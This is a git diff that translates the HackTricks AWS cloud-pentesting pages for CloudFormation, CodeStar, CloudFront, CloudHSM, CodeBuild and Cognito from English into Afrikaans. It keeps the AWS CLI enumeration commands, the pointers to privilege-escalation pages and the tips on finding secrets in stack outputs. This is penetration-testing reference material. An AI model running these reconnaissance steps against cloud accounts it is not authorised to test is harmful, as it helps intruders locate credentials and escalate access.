diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
index 66539b87d..baf41d0c6 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
@@ -4,10 +4,9 @@
 
 ## CloudFormation
 
-AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure.
+AWS CloudFormation is 'n diens wat ontwerp is om die **bestuur van AWS hulpbronne te vereenvoudig**. Dit stel gebruikers in staat om meer op hul toepassings wat in AWS loop te fokus deur **die tyd wat aan hulpbronbestuur bestee word te minimaliseer**. Die kernkenmerk van hierdie diens is die **sjabloon**—'n beskrywende model van die gewenste AWS hulpbronne. Sodra hierdie sjabloon verskaf is, is CloudFormation verantwoordelik vir die **verskaffing en konfigurasie** van die gespesifiseerde hulpbronne. Hierdie outomatisering fasiliteer 'n meer doeltreffende en foutvrye bestuur van AWS infrastruktuur.
 
 ### Enumeration
-
 ```bash
 # Stacks
 aws cloudformation list-stacks
@@ -30,10 +29,9 @@ aws cloudformation list-stack-instances --stack-set-name <name>
 aws cloudformation list-stack-set-operations --stack-set-name <name>
 aws cloudformation list-stack-set-operation-results --stack-set-name <name> --operation-id <id>
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse cloudformation permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **cloudformation-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-cloudformation-privesc/
@@ -41,14 +39,13 @@ In the following page you can check how to **abuse cloudformation permissions to
 
 ### Post-Exploitation
 
-Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation
+Kyk vir **geheime** of sensitiewe inligting in die **sjabloon, parameters & uitvoer** van elke CloudFormation
 
 ## Codestar
 
-AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members).
+AWS CodeStar is 'n diens vir die skep, bestuur en werk met sagteware-ontwikkelingsprojekte op AWS. Jy kan vinnig toepassings ontwikkel, bou en ontplooi op AWS met 'n AWS CodeStar-projek. 'n AWS CodeStar-projek skep en **integreer AWS-dienste** vir jou projekontwikkelingshulpmiddelketting. Afhangende van jou keuse van AWS CodeStar-projeksjabloon, kan daardie hulpmiddelketting bronbeheer, bou, ontplooiing, virtuele bedieners of serverlose hulpbronne, en meer insluit. AWS CodeStar **bestuur ook die toestemmings wat benodig word vir projekgebruikers** (genoem spanlede).
 
 ### Enumeration
-
 ```bash
 # Get projects information
 aws codestar list-projects
@@ -56,13 +53,12 @@ aws codestar describe-project --id <project_id>
 aws codestar list-resources --project-id <project_id>
 aws codestar list-team-members --project-id <project_id>
 
- aws codestar list-user-profiles
- aws codestar describe-user-profile --user-arn <arn>
+aws codestar list-user-profiles
+aws codestar describe-user-profile --user-arn <arn>
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse codestar permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **codestar-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-codestar-privesc/
@@ -73,7 +69,3 @@ In the following page you can check how to **abuse codestar permissions to escal
 - [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
index 75613cdb4..d166d2439 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
@@ -4,20 +4,19 @@
 
 ## CloudFront
 
-CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
+CloudFront is AWS se **inhoudsverspreidingsnetwerk wat die verspreiding** van jou statiese en dinamiese inhoud deur sy wêreldwye netwerk van randlokasies versnel. Wanneer jy 'n versoek inhoud gebruik wat jy deur Amazon CloudFront huisves, word die versoek na die naaste randlokasie gerouteer wat die laagste latensie bied om die beste prestasie te lewer. Wanneer **CloudFront-toeganglogs** geaktiveer is, kan jy die versoek van elke gebruiker wat toegang tot jou webwerf en verspreiding versoek, opneem. Soos met S3-toeganglogs, word hierdie logs ook **op Amazon S3 gestoor vir duursame en volgehoue berging**. Daar is geen koste verbonde aan die aktivering van logging self nie, egter, aangesien die logs in S3 gestoor word, sal jy koste hê vir die berging wat deur S3 gebruik word.
 
-The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**.
+Die loglêers vang data oor 'n tydperk en afhangende van die hoeveelheid versoeke wat deur Amazon CloudFront vir daardie verspreiding ontvang word, sal dit afhang van die hoeveelheid loglêers wat gegenereer word. Dit is belangrik om te weet dat hierdie loglêers nie op S3 geskep of geskryf word nie. S3 is bloot waar hulle afgelewer word sodra die loglêer vol is. **Amazon CloudFront hou hierdie logs totdat hulle gereed is om aan S3 afgelewer te word**. Weer, afhangende van die grootte van hierdie loglêers kan hierdie aflewering **tussen een en 24 uur** neem.
 
-**By default cookie logging is disabled** but you can enable it.
+**Standaard is koekielogging gedeaktiveer** maar jy kan dit aktiveer.
 
 ### Functions
 
-You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS).
+Jy kan funksies in CloudFront skep. Hierdie funksies sal sy **eindpunt in cloudfront** gedefinieer hê en sal 'n verklaarde **NodeJS-kode** uitvoer. Hierdie kode sal binne 'n **sandbox** op 'n masjien wat onder 'n AWS bestuurde masjien loop, uitgevoer word (jy sal 'n sandbox-bypass nodig hê om te kan ontsnap na die onderliggende OS).
 
-As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature.
+Aangesien die funksies nie in die gebruikers se AWS-rekening uitgevoer word nie, is daar geen IAM-rol aangeheg nie, so geen direkte privesc is moontlik deur hierdie kenmerk te misbruik nie.
 
 ### Enumeration
-
 ```bash
 aws cloudfront list-distributions
 aws cloudfront get-distribution --id <id> # Just get 1
@@ -28,21 +27,16 @@ aws cloudfront get-function --name TestFunction function_code.js
 
 aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME"
 ```
-
-## Unauthenticated Access
+## Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
 {{#endref}}
 
-## Post Exploitation
+## Na Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-cloudfront-post-exploitation.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
index 55216fa7e..f715ce723 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
@@ -4,68 +4,62 @@
 
 ## HSM - Hardware Security Module
 
-Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used.
+Cloud HSM is 'n FIPS 140 vlak twee gevalideerde **hardeware toestel** vir veilige kriptografiese sleutelberging (let daarop dat CloudHSM 'n hardeware toestel is, dit is nie 'n gevirtualiseerde diens nie). Dit is 'n SafeNetLuna 7000 toestel met 5.3.13 vooraf gelaai. Daar is twee firmware weergawes en watter een jy kies, hang regtig af van jou presiese behoeftes. Een is vir FIPS 140-2 nakoming en daar was 'n nuwer weergawe wat gebruik kan word.
 
-The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads
+Die ongewone kenmerk van CloudHSM is dat dit 'n fisiese toestel is, en dus is dit **nie gedeel met ander kliënte nie**, of soos dit algemeen genoem word, multi-tenant. Dit is 'n toegewyde enkel-tenant toestel wat eksklusief beskikbaar gestel word vir jou werklading.
 
-Typically, a device is available within 15 minutes assuming there is capacity, but in some zones there could not be.
+Tipies is 'n toestel binne 15 minute beskikbaar, mits daar kapasiteit is, maar in sommige sones mag dit nie wees nie.
 
-Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS.
+Aangesien dit 'n fisiese toestel is wat aan jou toegewy is, **word die sleutels op die toestel gestoor**. Sleutels moet of **na 'n ander toestel gerepliceer word**, geback-up word na offline berging, of uitgevoer word na 'n standby toestel. **Hierdie toestel is nie ondersteun** deur S3 of enige ander diens by AWS soos KMS nie.
 
-In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\
-Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution.
+In **CloudHSM** moet jy **die diens self skaal**. Jy moet genoeg CloudHSM toestelle voorsien om te hanteer wat jou versleuteling behoeftes is gebaseer op die versleuteling algoritmes wat jy gekies het om te implementeer vir jou oplossing.\
+Sleutelbestuurdiens skaal deur AWS en skaal outomaties op aanvraag, so soos jou gebruik groei, kan die aantal CloudHSM toestelle wat benodig word ook groei. Hou dit in gedagte terwyl jy jou oplossing skaal en as jou oplossing outo-skaal, maak seker jou maksimum skaal is in ag geneem met genoeg CloudHSM toestelle om die oplossing te bedien.
 
-Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster.
+Net soos met skaal, **is prestasie aan jou met CloudHSM**. Prestasie wissel gebaseer op watter versleuteling algoritme gebruik word en hoe gereeld jy toegang moet verkry of die sleutels moet onttrek om die data te versleuteling. Sleutelbestuurdiens prestasie word deur Amazon hanteer en skaal outomaties soos die vraag dit vereis. CloudHSM se prestasie word bereik deur meer toestelle by te voeg en as jy meer prestasie benodig, voeg jy of toestelle by of verander die versleuteling metode na die algoritme wat vinniger is.
 
-If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys.
+As jou oplossing **multi-streek** is, moet jy verskeie **CloudHSM toestelle in die tweede streek byvoeg en die kruis-streek konnektiwiteit uitwerk met 'n private VPN-verbinding** of 'n metode om te verseker dat die verkeer altyd beskerm is tussen die toestel op elke laag van die verbinding. As jy 'n multi-streek oplossing het, moet jy dink oor hoe om **sleutels te repliseer en addisionele CloudHSM toestelle op te stel in die streke waar jy werk**. Jy kan baie vinnig in 'n scenario beland waar jy ses of agt toestelle oor verskeie streke versprei het, wat volle redundans van jou versleuteling sleutels moontlik maak.
 
-**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution.
+**CloudHSM** is 'n ondernemingsklas diens vir beveiligde sleutelberging en kan gebruik word as 'n **wortel van vertroue vir 'n onderneming**. Dit kan private sleutels in PKI en sertifikaatowerheid sleutels in X509 implementasies stoor. Benewens simmetriese sleutels wat in simmetriese algoritmes soos AES gebruik word, **stoor KMS en fisies beskerm slegs simmetriese sleutels (kan nie as 'n sertifikaatowerheid optree nie)**, so as jy PKI en CA sleutels moet stoor, kan 'n CloudHSM of twee of drie jou oplossing wees.
 
-**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\
-Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance.
+**CloudHSM is aansienlik duurder as Sleutelbestuurdiens**. CloudHSM is 'n hardeware toestel, so jy het vaste koste om die CloudHSM toestel te voorsien, dan is daar 'n uurlikse koste om die toestel te laat loop. Die koste word vermenigvuldig met soveel CloudHSM toestelle wat benodig word om jou spesifieke vereistes te bereik.\
+Boonop moet kruis oorweging gemaak word in die aankoop van derdeparty sagteware soos SafeNet ProtectV sagteware suites en integrasietyd en -poging. Sleutelbestuurdiens is 'n gebruik gebaseerde diens en hang af van die aantal sleutels wat jy het en die invoer- en uitvoerbedrywighede. Aangesien sleutelbestuur naatlose integrasie met baie AWS dienste bied, moet integrasiekoste aansienlik laer wees. Koste moet as 'n sekondêre faktor in versleuteling oplossings beskou word. Versleuteling word tipies gebruik vir sekuriteit en nakoming.
 
-**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.
+**Met CloudHSM het net jy toegang tot die sleutels** en sonder om in te veel detail te gaan, met CloudHSM bestuur jy jou eie sleutels. **Met KMS bestuur jy en Amazon jou sleutels saam**. AWS het baie beleidsbeskermings teen misbruik en **kan steeds nie jou sleutels in enige oplossing toegang nie**. Die hoofonderskeid is nakoming soos dit betrekking het op sleutelbesit en bestuur, en met CloudHSM, is dit 'n hardeware toestel wat jy bestuur en onderhou met eksklusiewe toegang tot jou en net jou.
 
-### CloudHSM Suggestions
+### CloudHSM Voorstelle
 
-1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
-2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
-3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear.
-4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed.
-5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool.
-6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
-7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source.
+1. Ontplooi altyd CloudHSM in 'n **HA-opstelling** met ten minste twee toestelle in **verskillende beskikbaarheids sones**, en indien moontlik, ontplooi 'n derde of op die perseel of in 'n ander streek by AWS.
+2. Wees versigtig wanneer jy 'n **CloudHSM** **initieer**. Hierdie aksie **sal die sleutels vernietig**, so of jy moet 'n ander kopie van die sleutels hê of absoluut seker wees dat jy nie en nooit, ooit hierdie sleutels sal benodig om enige data te ontsleutel nie.
+3. CloudHSM ondersteun slegs **sekere weergawes van firmware** en sagteware. Voordat jy enige opdatering uitvoer, maak seker dat die firmware en of sagteware deur AWS ondersteun word. Jy kan altyd AWS ondersteuning kontak om te verifieer of die opgraderingsgids onduidelik is.
+4. Die **netwerk konfigurasie mag nooit verander word nie.** Onthou, dit is in 'n AWS datacentrum en AWS monitor basishardeware vir jou. Dit beteken dat as die hardeware faal, hulle dit vir jou sal vervang, maar net as hulle weet dit het gefaal.
+5. Die **SysLog voortgang mag nie verwyder of verander word nie**. Jy kan altyd 'n SysLog voortgangsverskaffer **byvoeg** om die logs na jou eie versamelingsinstrument te rig.
+6. Die **SNMP** konfigurasie het dieselfde basiese beperkings as die netwerk en SysLog vouer. Dit **mag nie verander of verwyder word nie**. 'n **Addisionele** SNMP konfigurasie is reg, maak net seker jy verander nie die een wat reeds op die toestel is nie.
+7. Nog 'n interessante beste praktyk van AWS is **om nie die NTP konfigurasie te verander nie**. Dit is nie duidelik wat sou gebeur as jy dit doen nie, so hou in gedagte dat as jy nie dieselfde NTP konfigurasie vir die res van jou oplossing gebruik nie, jy dalk twee tydbronne kan hê. Wees net bewus hiervan en weet dat die CloudHSM by die bestaande NTP bron moet bly.
 
-The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month.
+Die aanvanklike bekendstellingskoste vir CloudHSM is $5,000 om die hardeware toestel wat aan jou gebruik toegewy is, toe te ken, dan is daar 'n uurlikse koste verbonde aan die werking van CloudHSM wat tans $1.88 per uur van werking is, of ongeveer $1,373 per maand.
 
-The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**.
+Die mees algemene rede om CloudHSM te gebruik, is nakomingsstandaarde wat jy moet nakom vir regulerende redes. **KMS bied nie datasteun vir asimmetriese sleutels aan nie. CloudHSM laat jou toe om asimmetriese sleutels veilig te stoor**.
 
-The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
+Die **publieke sleutel word op die HSM toestel tydens voorsiening geïnstalleer** sodat jy toegang tot die CloudHSM instansie via SSH kan verkry.
 
-### What is a Hardware Security Module
+### Wat is 'n Hardware Security Module
 
-A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system.
+'n Hardware security module (HSM) is 'n toegewyde kriptografiese toestel wat gebruik word om kriptografiese sleutels te genereer, te stoor en te bestuur en sensitiewe data te beskerm. Dit is ontwerp om 'n hoë vlak van sekuriteit te bied deur die kriptografiese funksies fisies en elektronies van die res van die stelsel te isoleer.
 
-The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur:
+Die manier waarop 'n HSM werk, kan wissel afhangende van die spesifieke model en vervaardiger, maar oor die algemeen vind die volgende stappe plaas:
 
-1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator.
-2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**.
-3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation.
-4. **Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering.
-5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes.
+1. **Sleutelgenerasie**: Die HSM genereer 'n ewekansige kriptografiese sleutel met behulp van 'n veilige ewekansige nommer generator.
+2. **Sleutelberging**: Die sleutel word **veilig binne die HSM gestoor, waar dit slegs deur gemagtigde gebruikers of prosesse toegang kan verkry**.
+3. **Sleutelbestuur**: Die HSM bied 'n reeks sleutelbestuur funksies, insluitend sleutelrotasie, rugsteun en herroeping.
+4. **Kriptografiese bedrywighede**: Die HSM voer 'n reeks kriptografiese bedrywighede uit, insluitend versleuteling, ontsleuteling, digitale handtekening en sleuteluitruiling. Hierdie bedrywighede word **binne die veilige omgewing van die HSM uitgevoer**, wat teen ongeoorloofde toegang en vervalsing beskerm.
+5. **Auditskryf**: Die HSM registreer alle kriptografiese bedrywighede en toegangspogings, wat gebruik kan word vir nakoming en sekuriteitsouditdoeleindes.
 
-HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government.
+HSM's kan vir 'n wye reeks toepassings gebruik word, insluitend veilige aanlyn transaksies, digitale sertifikate, veilige kommunikasie en dataversleuteling. Hulle word dikwels in bedrywe gebruik wat 'n hoë vlak van sekuriteit vereis, soos finansies, gesondheidsorg en regering.
 
-Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure.
+Oor die algemeen maak die hoë vlak van sekuriteit wat deur HSM's verskaf word, dit **baie moeilik om rou sleutels daaruit te onttrek, en om dit te probeer, word dikwels beskou as 'n oortreding van sekuriteit**. Daar mag egter **sekere scenario's** wees waar 'n **rou sleutel deur gemagtigde personeel onttrek kan word** vir spesifieke doeleindes, soos in die geval van 'n sleutelherstelprosedure.
 
 ### Enumeration
-
 ```
 TODO
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
index bd54cd791..9af1e31ba 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
@@ -4,30 +4,29 @@
 
 ## CodeBuild
 
-AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass:
+AWS **CodeBuild** word erken as 'n **volledig bestuurde deurlopende integrasiediens**. Die primêre doel van hierdie diens is om die volgorde van die kompilering van bronkode, die uitvoering van toetse en die verpakking van die sagteware vir ontplooiing te outomatiseer. Die voornaamste voordeel wat deur CodeBuild aangebied word, lê in sy vermoë om die behoefte aan gebruikers om hul boubedieners te voorsien, te bestuur en te skaal, te verlig. Hierdie gerief is omdat die diens self hierdie take bestuur. Essensiële kenmerke van AWS CodeBuild sluit in:
 
-1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance.
-2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process.
-3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment.
+1. **Bestuurde Diens**: CodeBuild bestuur en skaal die boubedieners, wat gebruikers vrymaak van bedieneronderhoud.
+2. **Deurlopende Integrasie**: Dit integreer met die ontwikkeling en ontplooiing werkvloei, wat die bou- en toetsfases van die sagtewarevrystellingsproses outomatiseer.
+3. **Pakketproduksie**: Na die bou- en toetsfases, berei dit die sagtewarepakkette voor, wat dit gereed maak vir ontplooiing.
 
-AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability.
+AWS CodeBuild integreer naatloos met ander AWS-dienste, wat die doeltreffendheid en betroubaarheid van die CI/CD (Deurlopende Integrasie/Deurlopende Ontplooiing) pyplyn verbeter.
 
-### **Github/Gitlab/Bitbucket Credentials**
+### **Github/Gitlab/Bitbucket Kredensiale**
 
-#### **Default source credentials**
+#### **Standaard bronkredensiale**
 
-This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials.
+Dit is die nalatenskapopsie waar dit moontlik is om 'n paar **toegang** (soos 'n Github-token of -toepassing) te konfigureer wat **oor codebuild-projekte gedeel sal word**, sodat al die projekte hierdie geconfigureerde stel kredensiale kan gebruik.
 
-The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs.
+Die gestoor kredensiale (tokens, wagwoorde...) word **deur codebuild bestuur** en daar is geen openbare manier om dit van AWS API's te onttrek nie.
 
-#### Custom source credential
+#### Pasgemaakte bronkredensiaal
 
-Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**.
+Afhangende van die bergingsplatform (Github, Gitlab en Bitbucket) word verskillende opsies aangebied. Maar in die algemeen, enige opsie wat vereis om 'n **token of 'n wagwoord te stoor, sal dit as 'n geheim in die geheime bestuurder stoor**.
 
-This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one.
+Dit stel **verskillende codebuild-projekte in staat om verskillende geconfigureerde toegang te gebruik** tot die verskaffers in plaas van net die geconfigureerde standaard een te gebruik.
 
 ### Enumeration
-
 ```bash
 # List external repo creds (such as github tokens)
 ## It doesn't return the token but just the ARN where it's located
@@ -48,10 +47,9 @@ aws codebuild list-build-batches-for-project --project-name <p_name>
 aws codebuild list-reports
 aws codebuild describe-test-cases --report-arn <ARN>
 ```
-
 ### Privesc
 
-In the following page, you can check how to **abuse codebuild permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **kodebou toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-codebuild-privesc.md
@@ -74,7 +72,3 @@ In the following page, you can check how to **abuse codebuild permissions to esc
 - [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
index c870c1791..d6c1eff16 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
@@ -4,31 +4,30 @@
 
 ## Cognito
 
-Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple.
+Amazon Cognito word gebruik vir **authentisering, autorisering, en gebruikersbestuur** in web- en mobiele toepassings. Dit bied gebruikers die buigsaamheid om in te teken of direk met 'n **gebruikersnaam en wagwoord** of indirek deur 'n **derde party**, insluitend Facebook, Amazon, Google, of Apple.
 
-Central to Amazon Cognito are two primary components:
+Sentraal tot Amazon Cognito is twee primêre komponente:
 
-1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**.
-2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication.
+1. **Gebruikerspoele**: Dit is gidse wat ontwerp is vir jou app-gebruikers, wat **aanmeld- en registrasiefunksies** bied.
+2. **Identiteitspoele**: Hierdie poele is instrumenteel in **die autorisering van gebruikers om toegang tot verskillende AWS-dienste te verkry**. Hulle is nie direk betrokke by die aanmeld- of registrasieproses nie, maar is van kardinale belang vir hulpbron toegang na authentisering.
 
-### **User pools**
+### **Gebruikerspoele**
 
-To learn what is a **Cognito User Pool check**:
+Om te leer wat 'n **Cognito Gebruikerspoel kontroleer**:
 
 {{#ref}}
 cognito-user-pools.md
 {{#endref}}
 
-### **Identity pools**
+### **Identiteitspoele**
 
-The learn what is a **Cognito Identity Pool check**:
+Om te leer wat 'n **Cognito Identiteitspoel kontroleer**:
 
 {{#ref}}
 cognito-identity-pools.md
 {{#endref}}
 
-## Enumeration
-
+## Enumerasie
 ```bash
 # List Identity Pools
 aws cognito-identity list-identity-pools --max-results 60
@@ -72,14 +71,13 @@ aws cognito-idp get-user-pool-mfa-config --user-pool-id <user-pool-id>
 ## Get risk configuration
 aws cognito-idp describe-risk-configuration --user-pool-id <user-pool-id>
 ```
+### Identiteit Pools - Ongeauthentiseerde Enumerasie
 
-### Identity Pools - Unauthenticated Enumeration
+Net **om die Identiteit Pool ID** te weet, mag jy in staat wees om **akkrediteer te verkry van die rol wat aan ongeauthentiseerde** gebruikers gekoppel is (indien enige). [**Kyk hoe hier**](cognito-identity-pools.md#accessing-iam-roles).
 
